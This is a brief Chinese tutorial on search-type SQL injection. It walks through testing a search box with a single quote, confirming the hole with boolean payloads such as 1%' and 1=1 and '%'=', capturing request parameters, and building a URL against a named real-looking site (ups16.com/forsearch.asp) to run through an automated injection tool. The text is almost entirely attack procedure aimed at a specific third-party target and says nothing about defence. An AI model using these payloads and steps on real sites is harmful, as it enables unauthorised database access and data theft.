如上面的这样的带搜索框的,输入单引号测试 出现错误就存在搜索型注入漏洞
第一步:输入单引号点击搜索 出错就是典型的搜索型注入
第二步:用一个关键字来判断
1%’ and 1=1 and ‘%’=’ 返回正常
1%’ and 1=2 and ‘%’=’ 返回错误
第三步:用抓包工具抓包
sel_big=1&text_key=1&input.x=28&input.y=11
构造语句
http://www.ups16.com/forsearch.asp?sel_big=1&text_key=1&input.x=28&input.y=11
http://www.ups16.com/forsearch.asp?input.x=28&input.y=11&sel_big=1&text_key=1
第四步:用工具跑
将上面的网址输入到工具里面,选择post然后开炮
搜索型注入
最新推荐文章于 2024-03-02 03:23:15 发布